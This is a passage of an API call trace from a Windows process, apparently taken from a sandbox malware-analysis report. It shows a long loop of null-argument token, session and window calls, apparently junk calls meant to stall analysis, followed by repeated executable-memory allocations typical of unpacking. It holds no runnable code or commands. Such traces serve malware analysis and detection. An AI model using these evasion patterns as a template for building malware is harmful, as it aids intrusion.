TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.482] GetLastError () returned 0x7a [0221.482] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.482] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.482] WTSFreeMemory (pMemory=0x0) [0221.482] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.482] TextOutW (hdc=0x0, x=2434, y=5849, lpString="", c=0) returned 1 [0221.482] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.482] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.482] GetTickCount () returned 0xe4e1 [0221.483] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.483] SetForegroundWindow (hWnd=0x0) returned 0 [0221.483] BringWindowToTop (hWnd=0x0) returned 0 [0221.483] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5fc) returned 1 [0221.483] GetTokenInformation (in: TokenHandle=0x5fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.483] GetLastError () returned 0x7a [0221.483] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.483] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.483] WTSFreeMemory (pMemory=0x0) [0221.484] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.484] TextOutW (hdc=0x0, x=2444, y=5874, lpString="", c=0) returned 1 [0221.484] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.484] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.484] GetTickCount () returned 0xe4e1 [0221.484] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.484] SetForegroundWindow (hWnd=0x0) returned 0 [0221.484] BringWindowToTop (hWnd=0x0) returned 0 [0221.484] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x600) returned 1 [0221.484] GetTokenInformation (in: TokenHandle=0x600, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.484] GetLastError () returned 0x7a [0221.484] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.484] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.485] WTSFreeMemory (pMemory=0x0) [0221.485] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.485] TextOutW (hdc=0x0, x=2454, y=5899, lpString="", c=0) returned 1 [0221.485] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.485] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.485] GetTickCount () returned 0xe4e1 [0221.485] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.485] SetForegroundWindow (hWnd=0x0) returned 0 [0221.485] BringWindowToTop (hWnd=0x0) returned 0 [0221.485] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x604) returned 1 [0221.486] GetTokenInformation (in: TokenHandle=0x604, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.486] GetLastError () returned 0x7a [0221.486] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.486] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.486] WTSFreeMemory (pMemory=0x0) [0221.486] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.486] TextOutW (hdc=0x0, x=2464, y=5924, lpString="", c=0) returned 1 [0221.486] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.486] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.486] GetTickCount () returned 0xe4e1 [0221.487] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.487] SetForegroundWindow (hWnd=0x0) returned 0 [0221.487] BringWindowToTop (hWnd=0x0) returned 0 [0221.487] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x608) returned 1 [0221.487] GetTokenInformation (in: TokenHandle=0x608, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.487] GetLastError () returned 0x7a [0221.487] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.487] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.488] WTSFreeMemory (pMemory=0x0) [0221.488] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.488] TextOutW (hdc=0x0, x=2474, y=5949, lpString="", c=0) returned 1 [0221.488] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.488] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.488] GetTickCount () returned 0xe4e1 [0221.488] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.488] SetForegroundWindow (hWnd=0x0) returned 0 [0221.488] BringWindowToTop (hWnd=0x0) returned 0 [0221.488] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x60c) returned 1 [0221.488] GetTokenInformation (in: TokenHandle=0x60c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.488] GetLastError () returned 0x7a [0221.488] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.488] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.489] WTSFreeMemory (pMemory=0x0) [0221.489] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.489] TextOutW (hdc=0x0, x=2484, y=5974, lpString="", c=0) returned 1 [0221.489] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.489] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.489] GetTickCount () returned 0xe4e1 [0221.489] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.489] SetForegroundWindow (hWnd=0x0) returned 0 [0221.489] BringWindowToTop (hWnd=0x0) returned 0 [0221.490] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x610) returned 1 [0221.490] GetTokenInformation (in: TokenHandle=0x610, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.490] GetLastError () returned 0x7a [0221.490] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.490] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.490] WTSFreeMemory (pMemory=0x0) [0221.490] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.490] TextOutW (hdc=0x0, x=2494, y=5999, lpString="", c=0) returned 1 [0221.490] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.490] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.491] GetTickCount () returned 0xe4e1 [0221.491] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.491] SetForegroundWindow (hWnd=0x0) returned 0 [0221.491] BringWindowToTop (hWnd=0x0) returned 0 [0221.491] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x614) returned 1 [0221.491] GetTokenInformation (in: TokenHandle=0x614, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.491] GetLastError () returned 0x7a [0221.491] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.491] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.492] WTSFreeMemory (pMemory=0x0) [0221.492] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.492] TextOutW (hdc=0x0, x=2504, y=6024, lpString="", c=0) returned 1 [0221.492] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.492] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.492] GetTickCount () returned 0xe4e1 [0221.492] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.492] SetForegroundWindow (hWnd=0x0) returned 0 [0221.492] BringWindowToTop (hWnd=0x0) returned 0 [0221.492] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x618) returned 1 [0221.492] GetTokenInformation (in: TokenHandle=0x618, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.492] GetLastError () returned 0x7a [0221.492] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.493] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.497] WTSFreeMemory (pMemory=0x0) [0221.497] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.497] TextOutW (hdc=0x0, x=2514, y=6049, lpString="", c=0) returned 1 [0221.497] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.497] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.497] GetTickCount () returned 0xe4f1 [0221.497] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.497] SetForegroundWindow (hWnd=0x0) returned 0 [0221.497] BringWindowToTop (hWnd=0x0) returned 0 [0221.498] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x61c) returned 1 [0221.498] GetTokenInformation (in: TokenHandle=0x61c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.498] GetLastError () returned 0x7a [0221.498] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.498] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.498] WTSFreeMemory (pMemory=0x0) [0221.498] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.499] TextOutW (hdc=0x0, x=2524, y=6074, lpString="", c=0) returned 1 [0221.499] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.499] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.499] GetTickCount () returned 0xe4f1 [0221.499] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.499] SetForegroundWindow (hWnd=0x0) returned 0 [0221.499] BringWindowToTop (hWnd=0x0) returned 0 [0221.499] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x620) returned 1 [0221.499] GetTokenInformation (in: TokenHandle=0x620, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.499] GetLastError () returned 0x7a [0221.499] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.499] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.500] WTSFreeMemory (pMemory=0x0) [0221.500] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.500] TextOutW (hdc=0x0, x=2534, y=6099, lpString="", c=0) returned 1 [0221.500] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.500] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.500] GetTickCount () returned 0xe4f1 [0221.500] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.500] SetForegroundWindow (hWnd=0x0) returned 0 [0221.501] BringWindowToTop (hWnd=0x0) returned 0 [0221.501] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x624) returned 1 [0221.501] GetTokenInformation (in: TokenHandle=0x624, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.501] GetLastError () returned 0x7a [0221.501] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.501] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.501] WTSFreeMemory (pMemory=0x0) [0221.501] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.501] TextOutW (hdc=0x0, x=2544, y=6124, lpString="", c=0) returned 1 [0221.502] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.502] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.502] GetTickCount () returned 0xe4f1 [0221.502] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.502] SetForegroundWindow (hWnd=0x0) returned 0 [0221.502] BringWindowToTop (hWnd=0x0) returned 0 [0221.502] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x628) returned 1 [0221.502] GetTokenInformation (in: TokenHandle=0x628, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.502] GetLastError () returned 0x7a [0221.502] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.502] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.503] WTSFreeMemory (pMemory=0x0) [0221.503] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.503] TextOutW (hdc=0x0, x=2554, y=6149, lpString="", c=0) returned 1 [0221.503] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.503] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.503] GetTickCount () returned 0xe4f1 [0221.503] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.503] SetForegroundWindow (hWnd=0x0) returned 0 [0221.503] BringWindowToTop (hWnd=0x0) returned 0 [0221.503] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x62c) returned 1 [0221.503] GetTokenInformation (in: TokenHandle=0x62c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.503] GetLastError () returned 0x7a [0221.503] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.504] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.504] WTSFreeMemory (pMemory=0x0) [0221.504] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.504] TextOutW (hdc=0x0, x=2564, y=6174, lpString="", c=0) returned 1 [0221.504] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.504] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.504] GetTickCount () returned 0xe4f1 [0221.505] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.505] SetForegroundWindow (hWnd=0x0) returned 0 [0221.505] BringWindowToTop (hWnd=0x0) returned 0 [0221.505] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x630) returned 1 [0221.505] GetTokenInformation (in: TokenHandle=0x630, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.505] GetLastError () returned 0x7a [0221.505] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.505] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.505] WTSFreeMemory (pMemory=0x0) [0221.505] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.506] TextOutW (hdc=0x0, x=2574, y=6199, lpString="", c=0) returned 1 [0221.506] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.506] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.506] GetTickCount () returned 0xe4f1 [0221.506] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.506] SetForegroundWindow (hWnd=0x0) returned 0 [0221.506] BringWindowToTop (hWnd=0x0) returned 0 [0221.506] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x634) returned 1 [0221.506] GetTokenInformation (in: TokenHandle=0x634, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.506] GetLastError () returned 0x7a [0221.506] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.506] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.507] WTSFreeMemory (pMemory=0x0) [0221.507] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0228.872] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2118540, nNumberOfBytesToRead=0xfffffff2, lpNumberOfBytesRead=0x209b8dc, lpOverlapped=0x0 | out: lpBuffer=0x2118540, lpNumberOfBytesRead=0x209b8dc*=0x0, lpOverlapped=0x0) returned 0 [0228.872] CloseHandle (hObject=0xffffffff) returned 1 [0228.872] CloseHandle (hObject=0xffffffff) returned 1 [0228.872] ReadFile (in: hFile=0xffffffff, lpBuffer=0x0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x209b8dc, lpOverlapped=0x0 | out: lpBuffer=0x0, lpNumberOfBytesRead=0x209b8dc*=0x0, lpOverlapped=0x0) returned 0 [0228.872] CloseHandle (hObject=0xffffffff) returned 1 [0228.872] PathFileExistsA (pszPath="") returned 0 [0228.872] GetFileVersionInfoW (in: lptstrFilename="", dwHandle=0xe313, dwLen=0x0, lpData=0x209f494 | out: lpData=0x209f494) returned 0 [0228.873] GetModuleHandleA (lpModuleName="ntdll") returned 0x76f90000 [0228.873] GetModuleHandleA (lpModuleName="advapi32") returned 0x76040000 [0228.891] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0228.915] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0228.918] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0228.934] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0228.937] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0228.958] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0228.961] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0228.983] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0228.986] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.008] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.011] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.030] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.033] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.052] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.054] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.073] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.076] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.095] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.099] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.122] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.125] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.305] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.308] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.328] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.330] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.351] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.354] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.375] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.378] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.398] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.402] GetModuleHandleA (lpModuleName="ntdll") returned 0x76f90000 [0229.402] GetModuleHandleA (lpModuleName="advapi32") returned 0x76040000 [0229.414] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0229.420] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.439] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.449] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.481] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.483] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.505] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.508] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.526] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.529] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.547] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.550] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.568] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.571] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.593] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.595] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.614] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.617] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.639] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 